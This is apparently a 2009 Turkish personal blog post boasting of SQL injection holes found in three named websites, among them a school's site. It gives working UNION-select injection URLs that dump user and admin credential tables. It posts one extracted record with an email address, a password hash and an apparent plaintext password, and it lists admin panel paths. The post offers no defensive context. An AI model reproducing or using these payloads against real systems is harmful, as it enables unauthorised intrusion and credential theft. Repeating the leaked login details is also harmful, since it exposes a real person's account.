28 Mart 2009 Cumartesi

Bulgudum Bazı Sql Açıkları

http://www.d-smartsatis.com/index.php?sayfa=urun-detay&id=09+and+1=0+union+select+0,1,2,3,concat(Uye_Ad,0x3a,Uye_EPosta,0x3a,Uye_Sifre),5,6,7,8,9,10,11,12,13,14,15,16+from+uye

ugur:ugurgure@hotmail.com:*0C30D2D3BA6C7D32D87A53CDA6911BF7C718E51C

login :
ugurgure@hotmail.com
836928


http://www.gunesgida.com/index.php?link=grup1urun&kid=22&id=09+and+1=0+union+select+0,concat(kullanici,0x3a,sifre,0x3a,no),2+from+kullanici

admin panel
local/admin/


http://www.bursasporlisesi.k12.tr/index.php?page=haber_detay&recordID=09+and+1=0+union+select+0,concat(kullanici,0x3a,sifre),2,3,4+from+yonetim--

http://www.bursasporlisesi.k12.tr/yonetim/

Hiç yorum yok:

Yorum Gönder